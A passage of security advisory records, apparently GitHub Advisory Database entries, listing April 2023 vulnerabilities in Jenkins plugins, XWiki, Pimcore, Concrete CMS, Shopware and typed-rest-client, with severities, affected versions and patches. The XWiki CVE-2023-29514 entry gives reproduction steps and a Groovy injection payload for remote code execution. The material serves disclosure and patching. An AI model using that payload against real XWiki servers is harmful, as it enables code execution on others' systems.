[{'package': {'ecosystem': 'GitHub Actions', 'name': 'embano1/wip'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/embano1/wip/security/advisories/GHSA-rg3q-prf8-qxmp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-30623'}, {'type': 'WEB', 'url': 'https://github.com/embano1/wip/commit/c25450f77ed02c20d00b76ee3b33ff43838739a2'}, {'type': 'PACKAGE', 'url': 'https://github.com/embano1/wip'}, {'type': 'WEB', 'url': 'https://securitylab.github.com/research/github-actions-untrusted-input/'}]
|
{'cwe_ids': ['CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-04-24T22:32:32Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-f244-f9fc-w6fq
|
2023-04-12T22:19:47Z
|
2023-04-12T18:30:37Z
| null |
['CVE-2023-30515']
|
Jenkins Thycotic DevOps Secrets Vault Plugin does not properly mask credentials
|
Multiple Jenkins plugins do not properly mask (i.e., replace with asterisks) credentials printed in the build log from Pipeline steps like sh and bat, when both of the following conditions are met:
- The credentials are printed in build steps executing on an agent (typically inside a node block).
- Push mode for durable task logging is enabled. This is a hidden option in Pipeline: Nodes and Processes that can be enabled through the Java system property org.jenkinsci.plugins.workflow.steps.durable_task.DurableTaskStep.USE_WATCHING. It is also automatically enabled by some plugins, e.g., OpenTelemetry and Pipeline Logging over CloudWatch.
The following plugins are affected by this vulnerability:
- Kubernetes 3909.v1f2c633e8590 and earlier (SECURITY-3079 / CVE-2023-30513)
- Azure Key Vault 187.va_cd5fecd198a_ and earlier (SECURITY-3051 / CVE-2023-30514)
- Thycotic DevOps Secrets Vault 1.0.0 (SECURITY-3078 / CVE-2023-30515)
The following plugins have been updated to properly mask credentials in the build log when push mode for durable task logging is enabled:
- Kubernetes 3910.ve59cec5e33ea_ (SECURITY-3079 / CVE-2023-30513)
- Azure Key Vault 188.vf46b_7fa_846a_1 (SECURITY-3051 / CVE-2023-30514)
As of publication of this advisory, there is no fix available for the following plugin:
- Thycotic DevOps Secrets Vault 1.0.0 (SECURITY-3078 / CVE-2023-30515)
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'io.jenkins.plugins:thycotic-devops-secrets-vault'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-30515'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-04-12/#SECURITY-3075'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/04/13/3'}]
|
{'cwe_ids': ['CWE-319'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-04-12T22:19:47Z', 'nvd_published_at': '2023-04-12T18:15:00Z'}
|
1.4.0
|
GHSA-rfh6-mg6h-h668
|
2023-04-26T22:15:50Z
|
2023-04-12T20:36:56Z
| null |
['CVE-2023-29511']
|
xwiki-platform-administration-ui vulnerable to privilege escalation
|
### Impact
Any user with edit rights on a page (e.g., it's own user page), can execute arbitrary Groovy, Python or Velocity code in XWiki leading to full access to the XWiki installation. The root cause is improper escaping of the section ids in `XWiki.AdminFieldsDisplaySheet`. This page is installed by default.
Reproduction steps are described in https://jira.xwiki.org/browse/XWIKI-20261
### Patches
The vulnerability has been patched in XWiki 15.0-rc-1, 14.10.1, 14.4.8, and 13.10.11.
### Workarounds
The issue can be fixed by applying this [patch](https://github.com/xwiki/xwiki-platform/commit/f1e310826a19acdcdecdecdcfe171d21f24d6ede) on `XWiki.AdminFieldsDisplaySheet`.
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)
* Email us at [Security Mailing List](mailto:[email protected])
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-administration-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.5M2'}, {'fixed': '13.10.11'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-administration-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.0-rc-1'}, {'fixed': '14.4.8'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-administration-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.5'}, {'fixed': '14.10.1'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-rfh6-mg6h-h668'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-29511'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/f1e310826a19acdcdecdecdcfe171d21f24d6ede'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20261'}]
|
{'cwe_ids': ['CWE-95'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-04-12T20:36:56Z', 'nvd_published_at': '2023-04-16T08:15:00Z'}
|
1.4.0
|
GHSA-jwg4-qcgv-5wg6
|
2023-04-27T19:57:14Z
|
2023-04-27T17:11:21Z
| null |
['CVE-2023-30850']
|
SQL Injection in Admin Translations API
|
### Impact
SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. It generally allows an attacker to view data that they are not normally able to retrieve. This might include data belonging to other users, or any other data that the application itself is able to access.
In many cases, an attacker can modify or delete this data, causing persistent changes to the application's content or behavior. In some situations, an attacker can escalate an SQL injection attack to compromise the underlying server or other back-end infrastructure, or perform a denial-of-service attack. It was observed that the reported API endpoint accessible by an authenticated administrator user and is vulnerable to SQL injection via the "filter" POST parameter. The parameter accepts JSON formatted data. The value of JSON key "property" inside "filter" is not sanitized properly and is used in a SQL statement in an unsafe manner, resulting in SQL injection.
### Patches
Update to version 10.5.21 or apply this patch manually https://github.com/pimcore/pimcore/commit/7e32cc28145274ddfc30fb791012d26c1278bd38.patch
### Workarounds
Apply patch https://github.com/pimcore/pimcore/commit/7e32cc28145274ddfc30fb791012d26c1278bd38.patch manually.
### References
https://github.com/pimcore/pimcore/pull/14952
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.5.21'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/security/advisories/GHSA-jwg4-qcgv-5wg6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-30850'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/pull/14952'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/commit/7e32cc28145274ddfc30fb791012d26c1278bd38'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/commit/7e32cc28145274ddfc30fb791012d26c1278bd38.patch'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/pimcore'}]
|
{'cwe_ids': ['CWE-89'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-04-27T17:11:21Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-xfmj-r86m-j2hr
|
2023-05-01T13:53:49Z
|
2023-04-28T15:30:19Z
| null |
['CVE-2023-28477']
|
Stored cross site scripting on API integration
|
Concrete CMS (previously concrete5) before 9.2 is vulnerable to stored XSS on API Integrations via the name parameter.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'concrete5/concrete5'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '9.2.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28477'}, {'type': 'WEB', 'url': 'https://concretecms.com'}, {'type': 'WEB', 'url': 'https://www.concretecms.org/about/project-news/security/concrete-cms-security-advisory-2023-04-20'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-01T13:53:49Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-cjv6-w5hf-5wr6
|
2023-04-27T19:36:45Z
|
2023-04-27T19:36:45Z
| null |
['CVE-2023-2323']
|
Cross-site Scripting (XSS) in Ecommerce Pricing Rules name field
|
### Impact
This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie or redirect users to other malicious sites.
### Patches
Update to version 10.5.21 or apply this patch manually https://github.com/pimcore/pimcore/commit/e88fa79de7b5903fb58ddbc231130b04d937d79e.patch
### Workarounds
Apply patch https://github.com/pimcore/pimcore/commit/e88fa79de7b5903fb58ddbc231130b04d937d79e.patch manually.
### References
https://huntr.dev/bounties/41edf190-f6bf-4a29-a237-7ff1b2d048d3/
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:H/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.5.21'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/security/advisories/GHSA-cjv6-w5hf-5wr6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2323'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/commit/e88fa79de7b5903fb58ddbc231130b04d937d79e'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/pimcore'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/41edf190-f6bf-4a29-a237-7ff1b2d048d3'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-04-27T19:36:45Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-ph6g-6v8w-8p6m
|
2023-05-01T14:00:32Z
|
2023-04-28T15:30:19Z
| null |
['CVE-2023-28821']
|
Missing rate limit for password resets
|
Concrete CMS (previously concrete5) before 9.1 did not have a rate limit for password resets.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'concrete5/concrete5'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '9.1.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28821'}, {'type': 'WEB', 'url': 'https://github.com/concretecms/concretecms/releases'}, {'type': 'WEB', 'url': 'https://www.concretecms.org/about/project-news/security/concrete-cms-security-advisory-2023-04-20'}]
|
{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-05-01T14:00:32Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-w7r6-v4j7-h94w
|
2023-04-10T16:33:37Z
|
2023-04-03T09:30:19Z
| null |
['CVE-2023-26269']
|
Apache James server's JMX management service vulnerable to privilege escalation by local user
|
Apache James server version 3.7.3 and earlier provides a JMX management service without authentication by default. This allows privilege escalation by a malicious local user. Administrators are advised to disable JMX, or set up a JMX password. Note that version 3.7.4 onward will set up a JMX password automatically for Guice users.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.james:javax-mail-extension'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.7.4'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26269'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/james-project'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/2z44rg93pflbjhvbwy3xtz505bx41cbs'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/04/18/3'}]
|
{'cwe_ids': ['CWE-862'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-04-03T22:53:29Z', 'nvd_published_at': '2023-04-03T08:15:00Z'}
|
1.4.0
|
GHSA-m9qm-m5w5-9pgj
|
2023-04-06T15:07:04Z
|
2023-04-05T18:30:18Z
| null |
['CVE-2023-1879']
|
thorsten/phpmyfaq vulnerable to stored cross-site scripting (XSS) via updatecategory parameter
|
thorsten/phpmyfaq prior to 3.1.12 is vulnerable to stored cross-site scripting (XSS) because it fails to sanitize user input in the updatecategory parameter. This has been fixed in 3.1.12.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'thorsten/phpmyfaq'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.12'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1879'}, {'type': 'WEB', 'url': 'https://github.com/thorsten/phpMyFAQ/commit/a2642195e9fcb9a6f151bfaa4ff20bf1b905da2e'}, {'type': 'WEB', 'url': 'https://github.com/thorsten/phpmyfaq/commit/0dc8e527c375007cd4b8dbf61f7167393a6f6e91'}, {'type': 'PACKAGE', 'url': 'https://github.com/thorsten/phpMyFAQ'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/1dc7f818-c8ea-4f80-b000-31b48a426334'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-04-06T15:07:04Z', 'nvd_published_at': '2023-04-05T17:15:00Z'}
|
1.4.0
|
GHSA-j6qq-9939-9jv8
|
2023-04-21T20:34:23Z
|
2023-04-15T15:30:15Z
| null |
['CVE-2023-2102']
|
alextselegidis/easyappointments vulnerable to Stored Cross-site Scripting
|
alextselegidis/easyappointments is vulnerable to stored cross-site scripting in versions 1.4.3 and prior. A patch is available at commit bddc5cbeb7ff237a72943b304dcb01c653781767 and anticipated to be part of version 1.5.0.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:H/UI:R/S:C/C:L/I:L/A:H'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'alextselegidis/easyappointments'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.4.3'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2102'}, {'type': 'WEB', 'url': 'https://github.com/alextselegidis/easyappointments/commit/bddc5cbeb7ff237a72943b304dcb01c653781767'}, {'type': 'PACKAGE', 'url': 'https://github.com/alextselegidis/easyappointments'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/dd7c04a7-a984-4387-9ac4-24596e7ece44'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-04-21T20:34:23Z', 'nvd_published_at': '2023-04-15T13:15:00Z'}
|
1.4.0
|
GHSA-474f-mcjv-pgrm
|
2023-05-01T13:54:07Z
|
2023-04-28T15:30:19Z
| null |
['CVE-2023-28819']
|
Stored cross site scripting
|
Concrete CMS (previously concrete5) before 9.1 is vulnerable to Stored XSS in uploaded file and folder names.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'concrete5/concrete5'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '9.1.0'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28819'}, {'type': 'WEB', 'url': 'https://github.com/concretecms/concretecms/releases'}, {'type': 'WEB', 'url': 'https://www.concretecms.org/about/project-news/security/concrete-cms-security-advisory-2023-04-20'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2023-05-01T13:54:07Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-4697-3g92-gh78
|
2023-04-12T22:19:26Z
|
2023-04-12T18:30:37Z
| null |
['CVE-2023-30518']
|
Jenkins Thycotic Secret Server Plugin missing permissions check
|
Jenkins Thycotic Secret Server Plugin 1.0.2 and earlier does not perform a permission check in an HTTP endpoint.
This allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins. Those can be used as part of an attack to capture the credentials using another vulnerability.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'io.jenkins.plugins:thycotic-secret-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.2'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-30518'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-04-12/#SECURITY-2837'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/04/13/3'}]
|
{'cwe_ids': ['CWE-862'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-04-12T22:19:26Z', 'nvd_published_at': '2023-04-12T18:15:00Z'}
|
1.4.0
|
GHSA-g93x-fm2w-5pxw
|
2023-05-04T21:42:57Z
|
2023-04-27T23:09:36Z
| null |
['CVE-2023-2340']
|
Cross-site Scripting (XSS) in DataObject columns grid
|
### Impact
The attacker is capable to stolen the user session cookie. it will leads to complete account takeover.
### Patches
Update to version 10.5.21 or apply this patch manually https://github.com/pimcore/pimcore/commit/aa38319e353cc3cdfac12e03e21ed7a8f3628d3e.patch
### Workarounds
Apply patch https://github.com/pimcore/pimcore/commit/aa38319e353cc3cdfac12e03e21ed7a8f3628d3e.patch manually.
### References
https://huntr.dev/bounties/964762b0-b4fe-441c-81e1-0ebdbbf80f3b/
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.5.21'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/security/advisories/GHSA-g93x-fm2w-5pxw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2340'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/commit/aa38319e353cc3cdfac12e03e21ed7a8f3628d3e'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/pimcore'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/964762b0-b4fe-441c-81e1-0ebdbbf80f3b'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-04-27T23:09:36Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-7v2v-9rm4-7m8f
|
2023-04-18T13:14:20Z
|
2023-04-18T13:14:20Z
| null |
['CVE-2023-2017']
|
Improper Control of Generation of Code in Twig rendered views
|
### Impact
We fixed with [CVE-2023-22731](https://github.com/shopware/platform/security/advisories/GHSA-93cw-f5jj-x85w) Twig filters to only be executed with allowed functions. It is possible to pass PHP Closures as string or an array and array crafted PHP Closures was not checked against allow list
### Patches
The problem has been fixed with 6.4.20.1 with an improved override.
### Workarounds
For older versions of 6.1, 6.2, and 6.3, corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version.
### References
https://docs.shopware.com/en/shopware-6-en/security-updates/security-update-04-2023?category=security-updates
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'shopware/platform'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.4.20.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.4.20.0'}}, {'package': {'ecosystem': 'Packagist', 'name': 'shopware/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.4.20.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.4.20.0'}}]
|
[{'type': 'WEB', 'url': 'https://github.com/shopware/platform/security/advisories/GHSA-7v2v-9rm4-7m8f'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-2017'}, {'type': 'WEB', 'url': 'https://docs.shopware.com/en/shopware-6-en/security-updates/security-update-04-2023'}, {'type': 'PACKAGE', 'url': 'https://github.com/shopware/platform'}, {'type': 'WEB', 'url': 'https://github.com/shopware/platform/releases/tag/v6.4.20.1'}, {'type': 'WEB', 'url': 'https://starlabs.sg/advisories/23/23-2017/'}]
|
{'cwe_ids': ['CWE-1336', 'CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-04-18T13:14:20Z', 'nvd_published_at': '2023-04-17T11:15:00Z'}
|
1.4.0
|
GHSA-9j36-3cp4-rh4j
|
2023-04-20T21:46:57Z
|
2023-04-20T21:46:57Z
| null |
['CVE-2023-29514']
|
XWiki vulnerable to Code Injection in template provider administration
|
### Impact
Any user with edit rights on any document (e.g., the own user profile) can execute code with programming rights, leading to remote code execution by following these steps:
1. Set the title of any document you can edit (can be the user profile) to
```
{{async async="true" cached="false" context="doc.reference"}}{{groovy}}println("Hello " + "from groovy!"){{/groovy}}{{/async}}
```
2. Use the object editor to add an object of type `XWiki.TemplateProviderClass` (named "Template Provider Class") to that document.
3. Go to another document you can view (can be the home page) and append `?sheet=XWiki.AdminTemplatesSheet` to the URL.
When the attack is successful, a template with name "Hello from groovy!" is displayed in the list while on fixed systems, the full title should be displayed.
### Patches
This vulnerability has been patched in XWiki 13.10.11, 14.4.8, 14.10.1 and 15.0 RC1.
### Workarounds
The vulnerability can be fixed by patching the code in the affected XWiki document as shown in the [patch](https://github.com/xwiki/xwiki-platform/commit/7bf7094f8ffac095f5d66809af7554c9cc44de09).
### References
* https://jira.xwiki.org/browse/XWIKI-20268
* https://github.com/xwiki/xwiki-platform/commit/7bf7094f8ffac095f5d66809af7554c9cc44de09
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)
* Email us at [Security Mailing List](mailto:[email protected])
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform.applications:xwiki-application-administration'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.35'}, {'last_affected': '1.49'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-administration'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.1-milestone-1'}]}], 'database_specific': {'last_known_affected_version_range': '< 4.2-milestone-1'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-administration-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.2-milestone-1'}, {'fixed': '13.10.11'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-administration-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.0-rc-1'}, {'fixed': '14.4.8'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-administration-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.5'}, {'fixed': '14.10.1'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-9j36-3cp4-rh4j'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-29514'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/7bf7094f8ffac095f5d66809af7554c9cc44de09'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20268'}]
|
{'cwe_ids': ['CWE-74'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-04-20T21:46:57Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-558p-m34m-vpmq
|
2023-05-05T21:40:11Z
|
2023-04-27T14:02:11Z
| null |
['CVE-2023-30846']
|
Potential leak of authentication data to 3rd parties
|
### Impact
Users of typed-rest-client library version 1.7.3 or lower are vulnerable to leak authentication data to 3rd parties.
The flow of the vulnerability is as follows:
1. Send any request with `BasicCredentialHandler`, `BearerCredentialHandler` or `PersonalAccessTokenCredentialHandler`
2. The target host may return a redirection (3xx), with a link to a second host.
3. The next request will use the credentials to authenticate with the second host, by setting the `Authorization` header.
The expected behavior is that the next request will *NOT* set the `Authorization` header.
### Patches
The problem was fixed on April 1st 2020.
### Workarounds
There is no workaround.
### References
This is similar to the following issues in nature:
1. [HTTP authentication leak in redirects](https://curl.haxx.se/docs/CVE-2018-1000007.html) - I used the same solution as CURL did.
2. [CVE-2018-1000007](https://nvd.nist.gov/vuln/detail/CVE-2018-1000007).
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]
|
[{'package': {'ecosystem': 'npm', 'name': 'typed-rest-client'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.8.0'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/microsoft/typed-rest-client/security/advisories/GHSA-558p-m34m-vpmq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-30846'}, {'type': 'WEB', 'url': 'https://github.com/microsoft/typed-rest-client/pull/207'}, {'type': 'WEB', 'url': 'https://github.com/microsoft/typed-rest-client/commit/f9ff755631b982ee1303dfc3e3c823d0d31233e8'}, {'type': 'PACKAGE', 'url': 'https://github.com/microsoft/typed-rest-client'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230601-0008/'}]
|
{'cwe_ids': ['CWE-522'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-04-27T14:02:11Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-gh5w-gffh-68pr
|
2023-04-12T22:19:18Z
|
2023-04-12T18:30:36Z
| null |
['CVE-2023-30529']
|
Jenkins Lucene-Search Plugin vulnerable to Cross-Site Request Forgery
|
Jenkins Lucene-Search Plugin 387.v938a_ecb_f7fe9 and earlier does not require POST requests for an HTTP endpoint, resulting in a cross-site request forgery (CSRF) vulnerability.
This vulnerability allows attackers to reindex the database.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:lucene-search'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '387.v938a'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-30529'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-04-12/#SECURITY-3013'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/04/13/3'}]
|
{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-04-12T22:19:18Z', 'nvd_published_at': '2023-04-12T18:15:00Z'}
|
1.4.0
|
GHSA-2482-gr3v-f3f3
|
2023-04-12T22:18:21Z
|
2023-04-12T18:30:36Z
| null |
['CVE-2023-30522']
|
Jenkins Fogbugz Plugin has missing permissions check
|
Jenkins Fogbugz Plugin provides a webhook endpoint at `/fbTrigger/` that can be used to trigger builds of any jobs.
In Fogbugz Plugin 2.2.17 and earlier, this endpoint can be accessed by attackers with Item/Read permission, allowing them to trigger builds of jobs specified in a `jobname` request parameter.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:fogbugz'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.2.17'}]}]}]
|
